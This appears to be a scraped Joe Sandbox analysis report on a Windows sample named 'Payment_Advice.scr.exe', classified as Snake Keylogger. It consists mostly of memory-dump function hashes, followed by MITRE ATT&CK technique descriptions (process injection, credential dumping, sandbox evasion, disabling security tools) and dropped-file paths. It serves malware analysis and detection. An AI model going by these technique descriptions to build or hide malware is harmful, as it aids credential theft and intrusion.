Opcode Fuzzy Hash: 715e9b123e5f22e8d4b5a88ae5f1f234ded07661a39273116777b07aaac7cf87
Instruction Fuzzy Hash: 8AC19E74E01218CFDB14DFA5D984BADBBB2FF89300F6081A9D409AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557F880 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1d524007d172fdec4d577ebbfcb073389d1b8c3fada8b7fc50890de60bf8a8
Instruction ID: f19ea7fd80f67125089e371e0f10a21e365c14cf09be1876c428a6bca2b37c9f
Opcode Fuzzy Hash: 5a1d524007d172fdec4d577ebbfcb073389d1b8c3fada8b7fc50890de60bf8a8
Instruction Fuzzy Hash: 4DC19F74E01218CFDB14DFA5D984BADBBB2FF89300F2091A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557C8B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b86523dfc082a62b885687c3386850836165c0ba0c609565761c61939b6090
Instruction ID: 7f664b6cef24c531889785cf6f32fc3f3c3e3928648ac8ce43981e9a2943a031
Opcode Fuzzy Hash: 36b86523dfc082a62b885687c3386850836165c0ba0c609565761c61939b6090
Instruction Fuzzy Hash: 65C18D74E01218CFDB14DFA5D984BADBBB2BF89300F6081A9D409AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 055704A0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ec2a47a892f282c191b28a3bc343d06ccbd9d5118d8cfa65691baeca4b8e12
Instruction ID: 3851f0ef586a8da095537448693aa3e56101ef507978fa5ebd04317612c4f9ed
Opcode Fuzzy Hash: 17ec2a47a892f282c191b28a3bc343d06ccbd9d5118d8cfa65691baeca4b8e12
Instruction Fuzzy Hash: 57C18F74E01218CFDB54DFA9D984BADBBB2FF89300F1081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557B758 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675006c38abcdc2545ad413afbf71e2566a55fe0ee6be365f5faef5fabd7f1aa
Instruction ID: 1868611127821fc949edbb9e0588da6b0467cd1e91c9af3b4396c69fe89fe9dd
Opcode Fuzzy Hash: 675006c38abcdc2545ad413afbf71e2566a55fe0ee6be365f5faef5fabd7f1aa
Instruction Fuzzy Hash: A9C1AF74E01218CFDB14DFA5D984BADBBB2FF89300F6081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557EB78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695bb972c893d307c029cbfb4bfa240345e69e169d4ef384fe03800869810707
Instruction ID: 35f337cddb15a71d4bb54ff3cb36aa8cc3647c2e964ad1639a8b3cb4ca6965b9
Opcode Fuzzy Hash: 695bb972c893d307c029cbfb4bfa240345e69e169d4ef384fe03800869810707
Instruction Fuzzy Hash: 14C19F74E01218CFEB14DFA5D984BADBBB2FF89300F6081A9D809AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557B300 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65344bd3f516837e3a228c85ba301f7dd63b9f13c28639a7088aa847a4354186
Instruction ID: e1df05037c64f35d876bf9b317b49ca2ca412cc7b5eb150e34100797757f2b14
Opcode Fuzzy Hash: 65344bd3f516837e3a228c85ba301f7dd63b9f13c28639a7088aa847a4354186
Instruction Fuzzy Hash: 71C19E74E01218CFDB14DFA5D984BADBBB2FF89300F2081A9D409AB355EB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557E720 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b41ad042e4a581309cd62bb21a478f5945fe3211ad383592fc7b810f6432264
Instruction ID: 5e91f56986d5d0c277b88204d7799e6a6469d49f0250ed8566b2b346ba02378a
Opcode Fuzzy Hash: 6b41ad042e4a581309cd62bb21a478f5945fe3211ad383592fc7b810f6432264
Instruction Fuzzy Hash: E0C19E74E01218CFDB54DFA9D984BADBBB2FF89300F2081AAD409AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557EFD0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e268a912b42c95bd24415e4433e996775f430ba2c1a411c6d73a24693ba39a8a
Instruction ID: 232f4cfed1ba6b772757ed7ff8e9fb0101bca126816d800c72132fa00db98275
Opcode Fuzzy Hash: e268a912b42c95bd24415e4433e996775f430ba2c1a411c6d73a24693ba39a8a
Instruction Fuzzy Hash: 01C19F74E01218CFDB14DFA5D984BADBBB2FF89300F2091A9D409AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557BBB0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9ed08e10438ad884255cc0f12ae65d0952a3a2ce5b4e970c54f22b08f572aba
Instruction ID: 15df41a60bb0e681bb868a7f45b54e8af8050e368e208c0ce1f61a43f4db61a2
Opcode Fuzzy Hash: b9ed08e10438ad884255cc0f12ae65d0952a3a2ce5b4e970c54f22b08f572aba
Instruction Fuzzy Hash: 9EC19F74E01218CFDB14DFA9D984B9DBBB2FF89300F2091A9D409AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557DE70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c45c472c76dcda655cf86274627c1c1440596b5fecd0ac228439fb14d497375
Instruction ID: 7b19de5df56af474d7f97a67ce7e77d4ad79e02034fe712e01f0e5d251969f10
Opcode Fuzzy Hash: 1c45c472c76dcda655cf86274627c1c1440596b5fecd0ac228439fb14d497375
Instruction Fuzzy Hash: 2AC19F74E01218CFDB14DFA5D984BADBBB2FF89300F6081A9D409AB355DB355A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557DA18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23a2350b1425bc90acbb2d15725a3047e581d246ef14638e6b9b4628d083b4cf
Instruction ID: f76d6d5f6ca9d22e0c22cb76c61885a5a158469841c3c5263ff04f9d6febdcc1
Opcode Fuzzy Hash: 23a2350b1425bc90acbb2d15725a3047e581d246ef14638e6b9b4628d083b4cf
Instruction Fuzzy Hash: 2CC19E74E01258CFDB14DFA5D984BADBBB2FF89300F2081A9D809AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0557E2C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b70816f229ab241e4ebd76997c692448f597c115d5a05d50120613233f5ff1e
Instruction ID: e0cb38a6437c53c3f8a2c9ac41d3ac5cbeb2816634541d9e40aa676c3436a350
Opcode Fuzzy Hash: 0b70816f229ab241e4ebd76997c692448f597c115d5a05d50120613233f5ff1e
Instruction Fuzzy Hash: F0C19F74E01218CFEB14DFA5D984BADBBB2FF89300F6081A9D409AB355DB359A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 066533B8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3367340208.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6650000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1711b2473213370992744a494dc151ae6c51122635db6e35a6643dddd842942
Instruction ID: f7e889025766d63a59cbd32e49e851fa17dcc7467be758df5eafec1cf13c0d23
Opcode Fuzzy Hash: c1711b2473213370992744a494dc151ae6c51122635db6e35a6643dddd842942
Instruction Fuzzy Hash: F0B18674E01218CFDB54DFA9D894A9DBBB2FF89310F1181A9D819AB365DB30AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 055711C0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9405475588905bf234e8f890260c3c3bc2569b020038079ee6768b4b1f284747
Instruction ID: 9e66b8ec3663e45dfd7032178af9906ddaa9e7b83f07b2ad5971f37adcf208ba
Opcode Fuzzy Hash: 9405475588905bf234e8f890260c3c3bc2569b020038079ee6768b4b1f284747
Instruction Fuzzy Hash: A3A11570D00618CFEB24DFA9D884BDDBBB1FF88304F208269D419A7295DB749985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 055711B1 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfef4648e8351158ebf7b74f7d0a32a23e96006472889265d25ee00a3772d88c
Instruction ID: e4100659389a50fff73d5a54bb28cbef2272678de5583f257119f6804a0aa05b
Opcode Fuzzy Hash: bfef4648e8351158ebf7b74f7d0a32a23e96006472889265d25ee00a3772d88c
Instruction Fuzzy Hash: FFA11470D00218CFEB24DFA9D984BDDBBB1FF88304F208269D419AB295DB749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05571506 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3365771620.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5570000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bee140ca9c6a7919931ac4b72e2d93ceb0f5741b44187c7507516bd2aabc367
Instruction ID: 9ef478c375d78cd920859d5e1bdcb9d5f8bd4a9a15da05c212e1dac3af54a275
Opcode Fuzzy Hash: 1bee140ca9c6a7919931ac4b72e2d93ceb0f5741b44187c7507516bd2aabc367
Instruction Fuzzy Hash: E991F274D00618CFEB24DFA9D888BDCBBB1FF49310F209269E419AB291DB749985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00F680B3 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3358902712.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_f60000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8b1a604331826016004b2af43b7ff1319d9b3c1a589bb13f704abffd94cb73
Instruction ID: 22a37dcabcbc9c51ecce1dcd7d8f50eb450b1746134c86c32e07001d4e953deb
Opcode Fuzzy Hash: ab8b1a604331826016004b2af43b7ff1319d9b3c1a589bb13f704abffd94cb73
Instruction Fuzzy Hash: 77A19178A10218CFDB54DF68C894B99BBB2FF49310F1181D9E949AB365DB30AE91CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DDE943 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3356863322.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_dd0000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be79a6fcb1d8c5ffa6ee2704dfb885320cb232d67b74b42da87f24f83b894c7
Instruction ID: 4005369cfef64c74d3c76d41a9a673536d30eaed91e025a884c86dad243f79c3
Opcode Fuzzy Hash: 4be79a6fcb1d8c5ffa6ee2704dfb885320cb232d67b74b42da87f24f83b894c7
Instruction Fuzzy Hash: C4A16D74A01268CFDB64DF24C894B99BBB2BF4A300F5085EAD40DAB355DB719E81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 066533A8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3367340208.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6650000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4226458e73a86859db13d5b50c3ede4749f0e711fde178508bc4ee643db8130
Instruction ID: df7d67ab78cf0eae3ae108de80c6f58140be6ce42887b2a9b510d2fb6b6ebeea
Opcode Fuzzy Hash: c4226458e73a86859db13d5b50c3ede4749f0e711fde178508bc4ee643db8130
Instruction Fuzzy Hash: C5518374E016488FDB48DFAAD885A9DBBF2FF89310F148169D815BB365EB309942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DDEB23 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3356863322.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_dd0000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3eae52c762531e74106526c2938db16b54ecd383ab50309fb6d870f84d10b6
Instruction ID: d6f55be3c4c7cb16a46410f50b494ef1ec7d875adf8672ac3699e82ceab718f2
Opcode Fuzzy Hash: 0a3eae52c762531e74106526c2938db16b54ecd383ab50309fb6d870f84d10b6
Instruction Fuzzy Hash: C5515374A01268CFCB69DF24C894BA9B7B2FF4A301F5095EAD40AA7354DB719E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 066536CE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.3367340208.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6650000_hadvices.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e37f5f00c30706f406cf2cd29bae6c8754f01cc1e9d23092e3af80dad678c545
Instruction ID: 3e215e7163603bc2718ba5ace582f26fab79d1140466e6305cb4514d84c9a286
Opcode Fuzzy Hash: e37f5f00c30706f406cf2cd29bae6c8754f01cc1e9d23092e3af80dad678c545
Instruction Fuzzy Hash: FBD06775D44258CACF10DF6898423ADB772EB86300F00219A9509B7241D7305E558E26

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_Advice.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\Public\Payment_Advice.pdf

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a0668ec5-4e89-4b5a-9eda-c2985324fe74.tmp

Windows Analysis Report
Payment_Advice.scr.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

